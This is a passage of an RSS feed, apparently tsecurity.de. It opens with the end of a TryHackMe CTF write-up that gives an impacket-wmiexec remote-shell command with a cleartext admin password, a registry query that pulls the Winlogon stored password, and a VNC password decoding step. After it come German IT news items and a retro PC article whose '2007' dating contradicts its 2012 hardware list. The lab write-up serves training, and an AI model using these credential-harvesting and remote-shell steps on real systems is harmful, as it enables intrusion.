src="https://cdn-images-1.medium.com/max/1024/1*Qf0_u9lxOE4-wOqOt1EIaQ.png"></figure><ul><li>This seemed like a batch script that was running the infamous PsExec tool by Impacket, authenticating with administrator credentials. Here, I could view the admin password in cleartext, which could be used to gain a high-privilege shell to the target.</li><li>I used Impacket’s WMIExec tool to get a shell on the target. I could have used PsExec, but considering Windows Defender was running on the target, it would have been easily flagged.</li></ul><pre>impacket-wmiexec Administrator:RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi@10.48.186.208</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pArD96wPJGZhxCT1T0IZlQ.png"></figure><h3>0x03: Admin Shell</h3><ul><li>I also had to find the sign user’s password as per the objectives stated in the room. It took me quite a few lookups on Google till I eventually found a way to get the password from the Windows Registry.</li></ul><pre>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*u9c4IhdcofRGnplxbZhI-Q.png"></figure><ul><li>I was able to fetch the user's password from the Winlogon registry key.</li><li>Next, I had to find the VNC password. My first instinct was to return to the Installs share as before and look through the ultravnc.ini file.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/666/1*0Qhoz02MgHQ-GUJcsYtn2Q.png"></figure><ul><li>As can be seen in the first lines of the file itself, we found the encoded password.</li><li>I took the encoded parts of the password and used this website to decode them. <a href="https://keydecryptor.com/decryption-tools/vnc">Online VNC Password Decoder (Decryptor) — KeyDecryptor Tool</a></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vcNZJbS7yupNyyTcjDDO5Q.png"></figure><ul><li>I had successfully obtained the VNC password. The only objective that remained was the administrator flag.</li><li>I checked the Desktop folder of the Administrator and found the admin flag in admin_flag.txt .</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4Tn_PSdY2jrzVpJ-1Y0hHA.png"></figure><ul><li>And with that, all the flags were obtained, and the room was solved!</li></ul><p>I hope you found this write-up useful. Make sure to drop a follow for more such content in the future.</p><p>Happy Hacking!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=006864c93de0" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/allsignspoint2pwnage-tryhackme-windows-write-up-006864c93de0">AllSignsPoint2Pwnage — TryHackMe Windows Write-up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress zurücksetzen: Methoden und Hinweise]]></title>
<description><![CDATA[Die Flexibilität von WordPress ist gleichzeitig Segen und Fluch. Allzu leicht verstrickt man sich im Dickicht inkompatibler Plugins. Dann lädt die Site nicht mehr richtig oder versagt komplett den Dienst. Wie schön wäre es, einfach wieder von vorne anzufangen. Eine WordPress-Seite zurückzusetzen ...]]></description>
<link>https://tsecurity.de/de/3686000/server/wordpress-zuruecksetzen-methoden-und-hinweise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686000/server/wordpress-zuruecksetzen-methoden-und-hinweise/</guid>
<pubDate>Wed, 22 Jul 2026 12:45:32 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/website-erweiterung-t.jpg" width="1200" height="630" alt=""><br>Die Flexibilität von WordPress ist gleichzeitig Segen und Fluch. Allzu leicht verstrickt man sich im Dickicht inkompatibler Plugins. Dann lädt die Site nicht mehr richtig oder versagt komplett den Dienst. Wie schön wäre es, einfach wieder von vorne anzufangen. Eine WordPress-Seite zurückzusetzen ist jedoch ein komplexes Unterfangen. Wir zeigen Ihnen, wie es richtig geht.]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress-URL ändern: Drei Methoden, mit denen es funktioniert]]></title>
<description><![CDATA[Es gibt verschiedene Gründe, eine WordPress-URL zu ändern – sei es die Übertragung von einer Testumgebung auf eine Live-Seite oder ein Domain-Umzug. Es gibt auch verschiedene Methoden, die WordPress-Seiten-URL zu ändern: Dashboard, wpconfig.php-Datei oder Datenbank – wir erklären Schritt für Schr...]]></description>
<link>https://tsecurity.de/de/3685968/server/wordpress-url-aendern-drei-methoden-mit-denen-es-funktioniert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685968/server/wordpress-url-aendern-drei-methoden-mit-denen-es-funktioniert/</guid>
<pubDate>Wed, 22 Jul 2026 12:31:13 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/url-t.jpg" width="1200" height="630" alt=""><br>Es gibt verschiedene Gründe, eine WordPress-URL zu ändern – sei es die Übertragung von einer Testumgebung auf eine Live-Seite oder ein Domain-Umzug. Es gibt auch verschiedene Methoden, die WordPress-Seiten-URL zu ändern: Dashboard, wpconfig.php-Datei oder Datenbank – wir erklären Schritt für Schritt die einzelnen Möglichkeiten.]]></content:encoded>
</item>
<item>
<title><![CDATA[Darum sollten Sie auf Windows 11 umsteigen – falls Sie können]]></title>
<description><![CDATA[Laut einer neuen Studie von Lansweeper gibt es auf Computern mit Windows 10 durchschnittlich 1.903 aktive Sicherheitslücken. Bei Systemen mit Windows 11 liegt die durchschnittliche Anzahl der Sicherheitslücken dagegen bei lediglich 652, was einem Drittel der Anzahl entspricht.



Mit anderen Wort...]]></description>
<link>https://tsecurity.de/de/3685940/it-nachrichten/darum-sollten-sie-auf-windows-11-umsteigen-falls-sie-koennen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685940/it-nachrichten/darum-sollten-sie-auf-windows-11-umsteigen-falls-sie-koennen/</guid>
<pubDate>Wed, 22 Jul 2026 12:19:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Laut einer neuen Studie von <a href="https://www.lansweeper.com/blog/insights/windows-10-holdouts-carry-three-times-the-risk-of-windows-11/" data-type="link" data-id="https://www.lansweeper.com/blog/insights/windows-10-holdouts-carry-three-times-the-risk-of-windows-11/">Lansweeper</a> gibt es auf Computern mit Windows 10 durchschnittlich 1.903 aktive Sicherheitslücken. Bei Systemen mit Windows 11 liegt die durchschnittliche Anzahl der Sicherheitslücken dagegen bei lediglich 652, was einem Drittel der Anzahl entspricht.</p>



<p>Mit anderen Worten: Es könnte eine kluge Entscheidung sein, auf Windows 11 umzusteigen, sofern Sie die Möglichkeit dazu haben, berichtet die Seite <a href="https://www.neowin.net/news/one-in-six-pcs-still-run-windows-10-and-theyre-far-less-secure-than-windows-11/" data-type="link" data-id="https://www.neowin.net/news/one-in-six-pcs-still-run-windows-10-and-theyre-far-less-secure-than-windows-11/">Neowin</a>. Besonders in Deutschland sind viele Nutzer immer noch nicht auf die neue Version umgestiegen, <a href="https://www.pcwelt.de/article/3183702/windows-11-verliert-weltweit-nutzer-schock-fur-microsoft.html" target="_blank" rel="noreferrer noopener">und Windows 11 verlor zuletzt sogar Nutzerzahlen</a> (wenn auch an andere Betriebssysteme).</p>



<p>Bereits im Januar 2025 <a href="https://www.pcwelt.de/article/2569951/sicherheitsexperten-warnen-wechseln-sie-nicht-erst-im-oktober-auf-windows-11.html" target="_blank" rel="noreferrer noopener">warnten Sicherheitsexperten vor den Gefahren eines zu späten Wechsels.</a> Denn mit der Zeit sollen die Bedrohungen, denen sich Windows-10-Nutzer aussetzen, immer mehr und auch gefährlicher werden. </p>



<p>Da Microsoft Windows 10 nicht mehr offiziell mit Updates versorgt, sondern nur noch über das erweiterte Sicherheitsprogramm Sicherheitspatches erhält (<a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates-sensation.html" target="_blank" rel="noreferrer noopener">übrigens noch bis 2027, wie kürzlich bekannt wurde</a>), hat Windows 11 das vorherige Betriebssystem nun endgültig abgelöst.</p>



<p>Sollten Sie sich also dafür entscheiden, bei Windows 10 zu bleiben, dann melden Sie sich zumindest <a href="https://www.pcwelt.de/article/2941599/windows-10-gratis-sicher-nutzen-esu-registrierung-so-gehts.html" target="_blank" rel="noreferrer noopener">für das kostenlose ESU-Programm an</a>, das Ihnen noch bis zum 12. Oktober 2027 Zugang zu den neuesten Sicherheitspatches gewährt.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://www.pcwelt.de/article/3195776/windows-11-preview-das-bringen-die-naechsten-updates-an-neuerungen.html#" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading">Wechseln oder bleiben?</h2>



<p>Nicht jeder ist ein Fan von Windows 11. <a href="https://www.pcwelt.de/article/3053497/datenschuetzer-raten-bleiben-sie-unbedingt-bei-windows-10-warnen-vor-wechsel-zu-windows-11.html" target="_blank" rel="noreferrer noopener">Datenschützer rieten beispielsweise vom Wechsel auf Windows 11 ab</a> und empfahlen, so lange wie möglich bei Windows 10 zu bleiben. Was aber vor allem für Unternehmen und Organisationen gilt. </p>



<p>Unser Ratgeber <a href="https://www.pcwelt.de/article/2286220/windows-10-weiter-nutzen-oder-upgraden-unsere-empfehlungen-fur-wirklich-jeden-nutzer.html" target="_blank" rel="noreferrer noopener">Windows 10 weiter nutzen oder upgraden? Unsere Empfehlungen für wirklich jeden Nutzer</a> stellt verschiedene Lösungswege für Privatpersonen vor und erklärt, wie Sie mit dem nahenden Support-Ende von Windows 10 besser umgehen. In <a href="https://www.pcwelt.de/article/3057061/windows-11-26h2-auf-diese-neuerungen-durfen-sie-sich-freuen.html" target="_blank" rel="noreferrer noopener">Windows 11 26H2: Auf diese Neuerungen dürfen Sie sich freuen</a> stellen wir außerdem die kommenden Neuerungen des nächsten großen Windows-Updates vor.</p>



<p><a href="https://www.pcwelt.de/article/3195776/windows-11-preview-das-bringen-die-naechsten-updates-an-neuerungen.html" target="_blank" rel="noreferrer noopener">Windows 11 Preview: Das bringen die nächsten Updates an Neuerungen</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ME-South-1: Iran will AWS-Instanz in Bahrain zerstört haben]]></title>
<description><![CDATA[Der Iran will die AWS-Rechenzentren in Bahrain mit Marschflugkörpern zerstört haben. Der Angriff wurde von den USA, Amazon oder unabhängiger Seite bislang weder bestritten noch verifiziert. (AWS, Web Service)]]></description>
<link>https://tsecurity.de/de/3685930/it-nachrichten/me-south-1-iran-will-aws-instanz-in-bahrain-zerstoert-haben/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685930/it-nachrichten/me-south-1-iran-will-aws-instanz-in-bahrain-zerstoert-haben/</guid>
<pubDate>Wed, 22 Jul 2026 12:18:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Iran will die AWS-Rechenzentren in Bahrain mit Marschflugkörpern zerstört haben. Der Angriff wurde von den USA, Amazon oder unabhängiger Seite bislang weder bestritten noch verifiziert. (<a href="https://www.golem.de/specials/aws/">AWS</a>, <a href="https://www.golem.de/specials/webservice/">Web Service</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=211150&amp;page=1&amp;ts=1784715302" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Was ist der Wartungsmodus in WordPress?]]></title>
<description><![CDATA[Bei Umbauarbeiten am eigenen WordPress-Projekt, etwa bei der Umstellung auf ein neues Theme und damit verbundenen Anpassungen des Layouts oder bei einer Aktualisierung der Core-Dateien, sollte man den Wartungsmodus von WordPress verwenden. Dies verhindert, dass Besucher während der Wartung eine F...]]></description>
<link>https://tsecurity.de/de/3685768/server/was-ist-der-wartungsmodus-in-wordpress/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685768/server/was-ist-der-wartungsmodus-in-wordpress/</guid>
<pubDate>Wed, 22 Jul 2026 11:15:21 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/adblocker-t.jpg" width="1200" height="630" alt=""><br>Bei Umbauarbeiten am eigenen WordPress-Projekt, etwa bei der Umstellung auf ein neues Theme und damit verbundenen Anpassungen des Layouts oder bei einer Aktualisierung der Core-Dateien, sollte man den Wartungsmodus von WordPress verwenden. Dies verhindert, dass Besucher während der Wartung eine Fehlermeldung oder gar eine leere Seite angezeigt bekommen. Mit dem Wartungsmodus erstellt man eine statische Seite, die Leser darüber informiert, dass sich die Website momentan im Umbau befindet und wann sie wieder zur Verfügung steht. Aber wie aktiviert man den Wartungsmodus?]]></content:encoded>
</item>
<item>
<title><![CDATA[Vier Grafikkarten, sechs CPU-Kerne: So sah vor 14 Jahren die Höllenmaschine 4 aus]]></title>
<description><![CDATA[Hinweis: Dieser Artikel erschien im März 2007 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der Wayback Machine des Internet Archive das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen...]]></description>
<link>https://tsecurity.de/de/3685665/it-nachrichten/vier-grafikkarten-sechs-cpu-kerne-so-sah-vor-14-jahren-die-hoellenmaschine-4-aus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685665/it-nachrichten/vier-grafikkarten-sechs-cpu-kerne-so-sah-vor-14-jahren-die-hoellenmaschine-4-aus/</guid>
<pubDate>Wed, 22 Jul 2026 10:34:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hinweis: Dieser Artikel erschien im März 2007 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der <a href="https://web.archive.org/" target="_blank" rel="noreferrer noopener">Wayback Machine des Internet Archive</a> das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen.</p>



<p>Hier geht es direkt zum <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">Gewinnspiel der aktuellen Höllenmaschine HMX 6 im Gesamtwert von 40.000 Euro</a>. Bestens informiert bleiben Sie mit unserem <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen. Und nun viel Spaß mit der vierten Höllenmaschine:</p>



<p>Die PC-WELT Höllenmaschine 4 repräsentiert den Stand der PC-Technik. Die beste Hard- und Software ist gerade gut genug für den ultimativen Rechnertraum. Auch die vierte Generation im Wert von 13.333 Euro können Sie wieder gewinnen.</p>



<p>Das Rückgrat des 22 Kilogramm schweren <a href="https://web.archive.org/web/20120907053335/http://www.coolermaster.de/product.php?category_id=18&amp;product_id=6767">Cooler Master Cosmos II</a> bildet eine massive Stahlkonstruktion. Zu den Besonderheiten des 300 Euro teuren Big-Towers gehören eine zentrale Lüftersteuerung, Kabelmanagement, Flügeltüren und massig Platz: Das Gehäuse besitzt allein elf Laufwerksschächte für 3,5-Zoll-Festplatten und nimmt Hauptplatinen bis zum E-ATX-Formfaktor auf.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Airbrush der Höllenmaschine 4</h2>



<p>Für das lodernde Airbrush und das seitliche Sichtfenster der Höllenmaschine 4 zeichnen sich die Casemodder Martin und Stefan Blass verantwortlich. Sein höllisch gutes Aussehen verdankt das Gehäuse den international bekannten Casemoddern Martin und Stefan Blass. Auf ihrer <a href="https://web.archive.org/web/20120707010431/http://babetech.de/">Website</a> können Sie sich von den Fähigkeiten der kunstfertigen Casemodder überzeugen. Das preisgekrönte Brüderpaar kümmert sich nicht nur um das teuflische Airbrush und bauliche Veränderungen wie das seitliche Sichtfenster, sondern zeichnet sich auch für die Innenbeleuchtung der Gehäusemodifikation verantwortlich.</p>



<p>Die Gebrüder haben für den schönen Schein einen <a href="https://web.archive.org/web/20100211155227/http://www.leds-and-more.de/catalog/product_info.php?products_id=1128">Multidimmer von Richter</a> eingebaut, der LED-Ketten im Gehäuseinnenraum und im Bodenbereich ansteuert. Über die beiliegende Fernbedienung wählen Sie zwischen acht verschiedenen Grundfarben aus, regulieren die Helligkeit und definieren individuelle Farbwechsel.</p>



<p>Bei der Asus Rampage IV Extreme paart sich eine erlesene Hauptplatinen-Ausstattung mit einem detailverliebten UEFI-Bios, das keine Wünsche offen lässt: Die Sockel-LGA2011-Hauptplatine basiert auf dem Intel-Chipsatz X79. Das UEFI-Motherboard besitzt je acht Speicherbänke, SATA- und USB-Ports sowie fünfmal 16x PCI-Express 3.0. Zur Sonderausstattung gehören CMOS-, Start- und Reset-Knopf, Diagnose-LED, Bluetooth-Unterstützung und umfassende Übertaktungsoptionen, die sich zudem in Echtzeit überwachen lassen.</p>



<h2 class="wp-block-heading toc">Prozessor: die schnellste Desktop-CPU der Welt</h2>



<p>Der <a href="https://web.archive.org/web/20130510132630/http://www.pcwelt.de/produkte/CPU-mit-Rekordtempo-Intel-Core-i7-3960X-Extreme-Edition-im-Test-3907870.html">Intel Core i7-3960X</a> ist der aktuell schnellste Desktop-Prozessor im Test. Das Intel-Flaggschiff besitzt sechs CPU-Kerne und arbeitet dank Hyperthreading als virtueller 12‑Kern‑Prozessor. Der Werkstakt liegt bei 3,3 Gigahertz, in der Höllenmaschine 4 läuft der Core i7 mit 4 GHz. Berechnungen puffert der 3960X in einem dreistufigen Cache-System: So ist die dritte Cache-Stufe, die alle Prozessorkerne dynamisch nutzen können, 15 MB mächtig. Auf die erste und zweite Cache-Stufe mit 64 beziehungsweise 256 KB darf hingegen jeder CPU-Kern exklusiv zugreifen.</p>



<p>Eine der wichtigsten exklusiven Funktionen der LGA2011-Baureihe ist der integrierte Speicher-Controller, der vier DDR3-Kanäle gleichzeitig ansteuert. Ebenfalls in der CPU verbaut sind 40 PCI-Express-3.0-Kanäle. Zur weiteren Ausstattung gehören der Schutz vor Angriffen durch einen Puffer-Überlauf (XD-Bit), zusätzliche Befehlssätze wie SSE 4.2 und das Advanced Encryption Standard Instruction Set (AES IS) sowie die Advanced Vector Extensions (AVX). Zudem unterstützt der Prozessor die Virtualisierungs-Technik Intel VT sowie 32- und 64-Bit-Betriebssysteme – so lassen sich etwa virtuelle Workstations mit unterschiedlichen Betriebssystemen einrichten.</p>



<p>Die Wasserkühlung Cooler Master Eisberg 240L Prestige gibt die CPU-Abwärme über einen Dual-Radiator an die Außenwelt ab, der zwei 120-Millimeter-Lüfter beherbergt. Das Rotationstempo der mit knapp 21 dB(A) sehr leisen Lüfter liegt bei 1600 Umdrehungen pro Minute. Im Microchannel-Kühlblock arbeitet deutsche Pumpentechnik, die bis zu 400 Liter pro Stunde durch das Kühlsystem schleudert und für mindestens 50 000 Betriebsstunden ausgelegt ist. Der keramikbeschichtete Pumpenantrieb dreht sich mit bis zu 3600 Rotationen pro Minute.</p>



<h2 class="wp-block-heading toc">Grafik: 2x ASUS GTX690-4GD5 im Quad-SLI</h2>



<p>Um die Grafikdarstellung kümmert sich in der Höllenmaschine 4 die derzeit leistungsfähigste Grafikkarte der Welt, die <a href="https://web.archive.org/web/20121015164916/http://www.asus.com/Graphics_Cards/NVIDIA_Series/GTX6904GD5/">ASUS GTX690-4GD5</a>. Kostenpunkt: knapp 1000 Euro pro Stück. Die Karte beherbergt mit der <a href="https://web.archive.org/web/20121006082219/http://www.pcwelt.de/produkte/Grafikkarte-Nvidia-Geforce-GTX-690-im-Test-5780074.html">Nvidia Geforce GTX 690</a> gleich zwei 915 Megahertz schnelle Grafikprozessoren, die gemeinsam die 3D-Berechnung übernehmen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a22aec"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/ASUS-GTX690-4GD5-im-Quad-SLI.jpg?quality=50&amp;strip=all" alt="2x ASUS GTX690-4GD5 im Quad-SLI in der Höllenmaschine 4" class="wp-image-3188925" width="900" height="608" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Quad-SLI in der Höllenmaschine 4 mit zwei ASUS GTX690-4GD5</figcaption></figure><p class="imageCredit">PC-WELT</p></div>



<p>In der Höllenmaschine 4 sind gleich zwei der Asus-Doppeldecker, die über eine SLI-Brücke (Scalable Link Interface) verbunden sind. So arbeiten insgesamt vier Grafikprozessoren parallel im Quad-SLI-Modus. In der Summe stehen damit die Rechen-Power von 6144 Shader- und 512 Textur-Einheiten sowie 128 Rasteroperatoren bereit. Dabei kann der Karten-Verbund auf 4 Gigabyte GDDR5-Videospeicher zugreifen, der mit einem effektiven Datentakt von 6000 MHz arbeitet. Jede Grafikkarte besitzt mit einem Mini-Displayport und dreimal DVI vier digitale Ausgänge.</p>



<h2 class="wp-block-heading toc">Ausstattung der Höllenmaschine 4 im Überblick</h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><th>Komponente</th><th>Modell</th><th>Preis (Euro) <strong>am 31.8.2012</strong></th></tr><tr><td>Gehäuse</td><td>Casemod auf Basis des Cooler Master Cosmos II</td><td>1413</td></tr><tr><td>Hauptplatine</td><td>Asus Rampage IV Extreme, Intel X79, LGA2011</td><td>350</td></tr><tr><td>Prozessor</td><td>Intel Core i7-3960X, 3,30 GHz, 6 Kerne, 12 Theads</td><td>900</td></tr><tr><td>CPU-Kühlung</td><td>Cooler Master Eisberg 240L Prestige</td><td>180</td></tr><tr><td>Arbeitsspeicher</td><td>8 x 8 GB Adata XPG X Series PC3-17066U</td><td>880</td></tr><tr><td>Grafikkarte</td><td>2 x Asus GTX690-4GD5, Nvidia Geforce GTX 690</td><td>2000</td></tr><tr><td>Bildschirme</td><td>3 x ASUS VG278H, 27 Zoll, 3D-LED-LCD,</td><td>1550</td></tr><tr><td>SSD (System)</td><td>OCZ RevoDrive 3 X2 480GB, PCI-Express, 4fach Raid-0</td><td>650</td></tr><tr><td>Festplatten (Daten intern)</td><td>4 x Western Digital VelociRaptor 1000GB, Raid-5</td><td>1000</td></tr><tr><td>Festplatten (Daten extern)</td><td>2 x Western Digital Caviar Green 3000GB</td><td>300</td></tr><tr><td>Blu-ray-Brenner</td><td>Asus BW-12B1ST, SATA</td><td>100</td></tr><tr><td>Netzteil</td><td>Cooler Master Silent Pro Hybrid 1300W</td><td>250</td></tr><tr><td>Eingabegerät</td><td>Logitech G9x Laser Mouse und G19 Gaming Keyboard</td><td>200</td></tr><tr><td>Lautsprecher-Set</td><td>Logitech Z906, 5.1 System</td><td>250</td></tr><tr><td>Headset</td><td>Logitech G930 Wireless Gaming Headset</td><td>150</td></tr><tr><td>Betriebssystem</td><td>Microsoft Windows 7 Ultimate 64 Bit</td><td>160</td></tr><tr><td>Multimedia-Paket</td><td>Adobe Creative Suite 6 Design &amp; Web Premium</td><td>2000</td></tr><tr><td>Spiele-Paket</td><td>18 Top-Titel</td><td>600</td></tr><tr><td>Office-Paket</td><td>Microsoft Office Professional 2010</td><td>400</td></tr></tbody></table></figure>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a2346d"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/pc-welt-hoellenmaschine-4-von-links-mit-offener-fluegeltuer.jpg?quality=50&amp;strip=all" alt="Höllenmaschine 4 mit geöffneter Flügeltür" class="wp-image-3188918" width="1024" height="768" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PC-WELT</p></div>



<h2 class="wp-block-heading toc">Monitore: PC-Spiele in 3D auf 3 Panels gleichzeitig</h2>



<p>Der Höllenmaschine 4 stellen wir den 27-Zoll-Bildschirm <a href="https://web.archive.org/web/20120620023231if_/http://www.asus.de/Display/LCD_Monitors/VG278H">ASUS VG278H</a> zur Seite. Die physikalische Auflösung des 120-Hertz-Monitors beträgt 1920 x1080 Pixel, die Reaktionszeit 2 Millisekunden. Die LED-Hintergrundbeleuchtung erzielt eine Helligkeit von 300 cd/m2 und unterstützt die Lightboost-Technik und damit natürlich auch <a href="https://web.archive.org/web/20120905172245/http://www.pcwelt.de/produkte/Test-Nvidia-3D-Vision-2-4158397.html">Nvidia 3D Vision 2</a> – eine Technologie, die das Spielen in der dritten Dimension möglich macht. Im Lieferumfang des Asus-LCDs ist das “Nvidia 3D Vision”-Set aus Infrarot-Sender (integriert im Bildschirmrahmen) und Shutter-Brille enthalten. Der VG278H bietet mit DVI, HDMI und D-Sub drei Videoeingänge sowie einen Kopfhöreranschluss.</p>



<p>Ein großer 27-Zoll-Monitor ist gut, doch drei ASUS VG278H sind besser. Die gebündelte Auflösung des Bildschirm-Trios von 5760 x 1080 Pixeln erlaubt einen Desktop, auf dem sich bequem arbeiten lässt: Da kann man zahlreiche Fenster in ihrer vollen Größe geöffnet lassen, und behält dennoch den Überblick. Interessant ist diese große Arbeitsumgebung auch für Grafiker und Video-Bearbeiter, die dadurch gleich mehrere Projekte am Laufen halten, ohne eines schließen zu müssen.</p>



<p>Ernsthaften PC-Spielern kann dagegen die Bildschirmgröße nicht groß genug sein – denn sie bedeutet größere Übersicht und ein realistischeres Spielerlebnis. So füllt etwa die wunderschöne Landschaft in Skyrim die volle Breite der drei Monitore aus und wirkt dadurch schon fast wie ein echter Horizont, der Lust auf das Erkunden macht. Dank der brachialen Leistung der Höllenmaschine 4 und <a href="https://web.archive.org/web/20120825211507/http://www.nvidia.de/object/3d-vision-surround-requirements-de.html">Nvidia 3D Vision Surround</a> geht das auch flüssig in stereoskopischem 3D.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Arbeitsspeicher: Quad-Channel mit 64 Gigabyte</h2>



<p>Speicher kann man nie genug haben! Die acht Module Adata XPG X Series PC3-17066U mit jeweils 8 Gigabyte Kapazität steuert der Controller in der Intel-CPU im Vierkanal-Modus an. Die Module laufen mit 10-11-11-30er-Zugriffszeiten. Der mit dem Extreme Memory Profile (XMP) effektiv 2133 Megahertz schnelle Arbeitsspeicher beschert der Höllenmaschine 4 eine Speicherbandbreite von über 45 Gigabyte pro Sekunde. Da macht Virtualisierung so richtig Spaß.</p>



<h2 class="wp-block-heading toc">PCI-Express-SSD, 4 WD VelociRaptor und 4 WD Caviar Green </h2>



